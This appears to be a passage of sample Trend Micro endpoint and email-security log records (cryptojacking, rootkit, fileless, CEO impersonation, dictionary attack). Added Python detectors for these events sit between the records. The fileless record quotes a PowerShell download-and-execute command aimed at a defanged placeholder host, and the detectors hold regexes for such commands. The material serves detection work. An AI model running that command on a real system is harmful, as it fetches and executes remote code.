- Network Destination URL: hxxp://malware[.]com/powershell.ps1
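
Added example, not part of the sample log set above: a small Python parser for the "Key: Value" record layout used by the Apex One entries, with detection rules that fire on the cryptojacking, rootkit and fileless records. The embedded records are constructed and abridged from the page's samples; the mining-pool port list, the scratch-directory and system-directory prefixes, and the rule names are assumptions of this example, not Apex One fields.

```python
import ntpath
import re

# Constructed sample, abridged from the three Apex One endpoint records on this page.
# The values are the page's placeholders, not real indicators.
SAMPLE_LOG = r"""
Event Time: 2023-03-15 10:15:00
Event Category: Cryptojacking
- File Name: C:\Users\jane.doe\AppData\Local\Temp\miner.exe
- Process Name: C:\Windows\System32\svchost.exe
- Process Command Line: svchost.exe -k LocalSystemNetworkRestricted
- Network Connection: 192.168.1.100:1234 -> 192.168.1.200:3333
- Network Destination Reputation: Malicious

Event Time: 2023-03-16 12:30:00
Event Category: Rootkit
- File Name: C:\Windows\System32\drivers\mrxsmb.sys
- Process Name: C:\Windows\System32\svchost.exe
- System Call Result: 0xC0000022 (STATUS_ACCESS_DENIED)
- Rootkit Technique: Direct Kernel Object Manipulation (DKOM)

Event Time: 2023-03-17 14:45:00
Event Category: Fileless
- Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- Process Command Line: powershell.exe -noprofile -command "IEX (New-Object Net.WebClient).DownloadString('hxxp://malware[.]com/powershell.ps1')"
- Network Connection: 192.168.1.100:1234 -> hxxp://malware[.]com:80
"""

# One "Key: Value" line, with or without the leading "- " bullet.
FIELD_RE = re.compile(r"^\s*-?\s*([A-Za-z][A-Za-z ]*?):\s*(.*)$")

# Assumptions for the rules (not Apex One fields): ports commonly used by Stratum
# mining pools, scratch directories, and the Windows system directory.
MINING_POOL_PORTS = {3333, 4444, 5555, 7777, 14444}
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
SYSTEM_DIR = "c:\\windows\\system32\\"
CRADLE_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
CRADLE_FETCH = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)


def parse_records(text):
    """Split the log on blank lines and turn each record into a {field: value} dict."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                rec[m.group(1).strip()] = m.group(2).strip()
        if "Event Time" in rec:
            records.append(rec)
    return records


def dest_port(rec):
    """Destination port from the explicit field, else from the 'src -> dst:port' connection string."""
    v = rec.get("Network Destination Port", "")
    if v.isdigit():
        return int(v)
    m = re.search(r"->\s*\S+:(\d+)\s*$", rec.get("Network Connection", ""))
    return int(m.group(1)) if m else None


def rule_temp_masquerade(rec):
    # A system binary (svchost.exe) tied to an executable dropped in a scratch directory.
    path = rec.get("File Name", "").lower()
    proc = rec.get("Process Name", "").lower()
    if any(d in path for d in TEMP_DIRS) and proc.startswith(SYSTEM_DIR):
        return f"system binary {ntpath.basename(proc)} tied to executable in scratch dir {path}"
    return None


def rule_mining_pool(rec):
    # Outbound connection to a typical Stratum pool port, or to a destination already rated malicious.
    port = dest_port(rec)
    rep = rec.get("Network Destination Reputation", "").lower()
    if port in MINING_POOL_PORTS or rep == "malicious":
        return f"outbound to port {port}, destination reputation {rep or 'unknown'}"
    return None


def rule_powershell_cradle(rec):
    # Both halves of a download cradle in one command line: a fetch primitive and an in-memory execute.
    cmd = rec.get("Process Command Line", "")
    if CRADLE_EXEC.search(cmd) and CRADLE_FETCH.search(cmd):
        return "PowerShell download-and-execute cradle: " + cmd[:80]
    return None


def rule_kernel_tampering(rec):
    # Kernel object manipulation or hooking reported for a driver.
    tech = (rec.get("Rootkit Technique", "") + " " + rec.get("Rootkit Behavior", "")).lower()
    driver = ntpath.basename(rec.get("File Name", ""))
    if "dkom" in tech or "direct kernel object" in tech or "hook" in tech:
        return f"kernel tampering via driver {driver or 'unknown'}"
    return None


RULES = [
    ("temp_masquerade", rule_temp_masquerade),
    ("mining_pool_port", rule_mining_pool),
    ("powershell_cradle", rule_powershell_cradle),
    ("kernel_tampering", rule_kernel_tampering),
]


def analyze(text):
    """Map each record's Event Time to the list of (rule name, detail) pairs that matched."""
    out = {}
    for rec in parse_records(text):
        hits = [(name, detail) for name, fn in RULES if (detail := fn(rec))]
        out[rec["Event Time"]] = hits
    return out


if __name__ == "__main__":
    for ts, hits in analyze(SAMPLE_LOG).items():
        print(ts, hits)
```

analyze(SAMPLE_LOG) returns, per Event Time, the rule names and details that matched. The rules look only at fields the records already carry, so they can be tuned against a real export without touching the parser; the port list and directory prefixes are the parts a practitioner would adjust first.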

Impersonation Attack:
Event Time: 2023-03-18 10:15:00
Event Category: Impersonation
Event Level: High
Source: Trend Micro Email Security

Description:
Trend Micro Email Security detected and blocked an impersonation attack on email account
[email protected]. The attack used a spoofed sender email address to impersonate the CEO
of Contoso, Inc.

Additional Details:


- Attack Type: Impersonation
- Attack Technique: Email Spoofing
- Attack Vector: Social Engineering
- Attack Payload: Malicious email with phishing link
- Attack Source: hxxp://phishing[.]com
- Attack Destination: [email protected]
- Attack Sender: [email protected] (spoofed)
- Attack Sender IP: 192.168.1.100
- Attack Sender Domain: contoso.com (spoofed)
- Attack Subject: Urgent: Update Your Account Information
- Attack Body: Please click on the link below to update your account information:
hxxp://phishing[.]com/update
- Attack Attachment: None
- Attack Header Analysis:
- From: [email protected] (spoofed)
- Reply-To: [email protected]
- Return-Path: [email protected]
- Message-ID: <[email protected]>
- Authentication-Results: none
- Attack Reputation:
- Sender IP Reputation: 80 (High Risk)
- Sender Domain Reputation: 90 (Very High Risk)
- URL Reputation: 95 (Extremely High Risk)
- Attack Classification:
- Category: Impersonation
- Subcategory: Email Spoofing
- Confidence: 95
- Action Taken: Blocked and quarantined the email
- User Action: None required
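
Added example, not from the page: the header checks behind the impersonation record above, written with Python's standard email module. It flags a Reply-To or Return-Path domain that differs from the From domain, a From domain of the organisation's own that carries no aligned DMARC pass, and body links to hosts outside the sender's domain. The two messages are constructed; the addresses ceo@contoso.com, reply@phishing.com and bounce@phishing.com stand in for the redacted ones on the page, and the protected-domain set and the block threshold are assumptions of this example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed messages (not from the page). The addresses stand in for the redacted ones
# in the impersonation record; phishing.com is only a placeholder for the attacker's domain.
SPOOFED_MSG = """\
From: "Contoso CEO" <ceo@contoso.com>
Reply-To: <reply@phishing.com>
Return-Path: <bounce@phishing.com>
To: <employee@contoso.com>
Subject: Urgent: Update Your Account Information
Message-ID: <abc123@phishing.com>
Authentication-Results: none

Please click on the link below to update your account information:
hxxp://phishing[.]com/update
"""

LEGIT_MSG = """\
From: "Contoso CEO" <ceo@contoso.com>
To: <employee@contoso.com>
Subject: Q2 planning
Message-ID: <def456@contoso.com>
Authentication-Results: mx.contoso.com; spf=pass smtp.mailfrom=contoso.com; dkim=pass header.d=contoso.com; dmarc=pass header.from=contoso.com

Slides are on the intranet: https://intranet.contoso.com/q2
"""

# Host part of http(s) and defanged hxxp(s) URLs.
URL_HOST_RE = re.compile(r"\b(?:hxxps?|https?)://([^\s/]+)", re.I)


def domain_of(header_value):
    """Domain part of the first address in a header, or None if there is no address."""
    addr = parseaddr(header_value or "")[1]
    return addr.rpartition("@")[2].lower() or None


def analyze_email(raw, protected_domains):
    """Return the list of spoofing indicators found in one RFC 5322 message."""
    msg = message_from_string(raw)
    findings = []
    from_dom = domain_of(msg["From"])

    # Reply-To / Return-Path pointing at another domain than From is the classic CEO-fraud shape.
    for hdr in ("Reply-To", "Return-Path"):
        dom = domain_of(msg[hdr])
        if dom and from_dom and dom != from_dom:
            findings.append(hdr.lower().replace("-", "_") + "_mismatch")

    # Only a DMARC pass aligned with the From domain counts as authenticated;
    # "none" or a missing header means the From address was never verified.
    auth = (msg["Authentication-Results"] or "").lower()
    if f"dmarc=pass header.from={from_dom}" not in auth:
        findings.append("no_dmarc_pass")
        if from_dom in protected_domains:
            findings.append("own_domain_unauthenticated")

    # Links to hosts outside the sender's domain; defanged hxxp/[.] forms are refanged first.
    body = msg.get_payload() if not msg.is_multipart() else ""
    hosts = [h.replace("[.]", ".").lower() for h in URL_HOST_RE.findall(body)]
    if any(not (from_dom and (h == from_dom or h.endswith("." + from_dom))) for h in hosts):
        findings.append("external_link")
    return findings


def verdict(findings):
    """Assumed policy: block on an unauthenticated use of a protected domain, or on two or more indicators."""
    if "own_domain_unauthenticated" in findings or len(findings) >= 2:
        return "block"
    return "deliver"


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_MSG), ("legit", LEGIT_MSG)):
        found = analyze_email(raw, {"contoso.com"})
        print(label, verdict(found), found)
```

The decisive check is the third one: a message claiming to be from the organisation's own domain that arrives without an aligned DMARC pass should be blocked on that alone, which is why the verdict does not wait for a second indicator in that case. Real gateways evaluate Authentication-Results from their own trusted authserv-id; the substring match here is the simplification to replace first.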
Dictionary Traversal:
Event Time: 2023-03-19 14:30:00
Event Category: Dictionary Traversal
Event Level: High
Source: Trend Micro Email Security

Description:
Trend Micro Email Security detected and blocked a dictionary traversal attack on email account
[email protected]. The attack used a series of common passwords to attempt to gain
unauthorized access to the email account.

Additional Details:


- Attack Type: Dictionary Traversal
- Attack Technique: Brute Force
- Attack Vector: Password guessing (dictionary attack)
- Attack Payload: None
- Attack Source: 192.168.1.100
- Attack Destination: smtp.office365.com
- Attack Sender: [email protected]
- Attack Sender IP: 192.168.1.100
- Attack Authentication: Anonymous
- Attack Password Attempts:
- Password Attempt 1: password1
- Password Attempt 2: password2
- Password Attempt 3: password3
- Password Attempt 4: password4
- Password Attempt 5: password5
- Attack Classification:
- Category: Brute Force
- Subcategory: Dictionary Traversal
- Confidence: 95
- Action Taken: Blocked and logged the IP address
- User Action: None required
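
Added example, not from the page: sliding-window counting of failed logins for the dictionary attack above, generalised to also catch password spraying (one source, many accounts, one guess each), which the per-account threshold alone would miss. The auth log lines are constructed; the threshold, window and spray values, and the line format, are assumptions of this example. Unlike the record above, it records only the outcome, source and account of each attempt, never the guessed passwords.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed auth log (not from the page). Only outcome, source and account are recorded;
# the guessed passwords are deliberately not logged.
SAMPLE_AUTH_LOG = """
2023-03-19 14:29:50 AUTH_FAIL src=192.168.1.100 user=employee@contoso.com
2023-03-19 14:29:52 AUTH_FAIL src=192.168.1.100 user=employee@contoso.com
2023-03-19 14:29:54 AUTH_FAIL src=192.168.1.100 user=employee@contoso.com
2023-03-19 14:29:56 AUTH_FAIL src=192.168.1.100 user=employee@contoso.com
2023-03-19 14:29:58 AUTH_FAIL src=192.168.1.100 user=employee@contoso.com
2023-03-19 14:30:05 AUTH_FAIL src=192.168.1.77 user=alice@contoso.com
2023-03-19 14:30:07 AUTH_FAIL src=192.168.1.77 user=bob@contoso.com
2023-03-19 14:30:09 AUTH_FAIL src=192.168.1.77 user=carol@contoso.com
2023-03-19 14:30:11 AUTH_FAIL src=192.168.1.77 user=dave@contoso.com
2023-03-19 14:30:13 AUTH_FAIL src=192.168.1.77 user=erin@contoso.com
2023-03-19 14:30:20 AUTH_FAIL src=192.168.1.5 user=frank@contoso.com
2023-03-19 14:30:25 AUTH_OK src=192.168.1.5 user=frank@contoso.com
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<result>AUTH_FAIL|AUTH_OK) "
    r"src=(?P<src>\S+) user=(?P<user>\S+)$"
)


def parse_auth_log(text):
    """Yield (timestamp, result, source_ip, account) tuples; malformed lines are skipped."""
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["result"], m["src"], m["user"])


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60), spray_users=5):
    """Return {source_ip: (kind, detail)} for sources that exceed the limits inside the window.

    kind is "dictionary" (threshold failures against one account) or "password_spray"
    (failures against spray_users distinct accounts). Each source is reported once.
    """
    recent = defaultdict(deque)    # src -> deque of (ts, user) failures still inside the window
    alerts = {}
    for ts, result, src, user in sorted(events):
        if result != "AUTH_FAIL" or src in alerts:
            continue
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:   # drop failures that fell out of the window
            q.popleft()
        per_user = Counter(u for _, u in q)
        if per_user[user] >= threshold:       # many guesses against one account
            alerts[src] = ("dictionary", user)
        elif len(per_user) >= spray_users:    # one guess each against many accounts
            alerts[src] = ("password_spray", len(per_user))
    return alerts


if __name__ == "__main__":
    for src, (kind, detail) in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"{src}: {kind} ({detail})")
```

Two successes-after-failure from 192.168.1.5 stay below both limits and produce no alert, which is the behaviour wanted for a user who mistypes a password. A spraying attacker who slows down below one attempt per window per source is the case this window-based count does not catch; that needs a longer window keyed on the account rather than the source.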
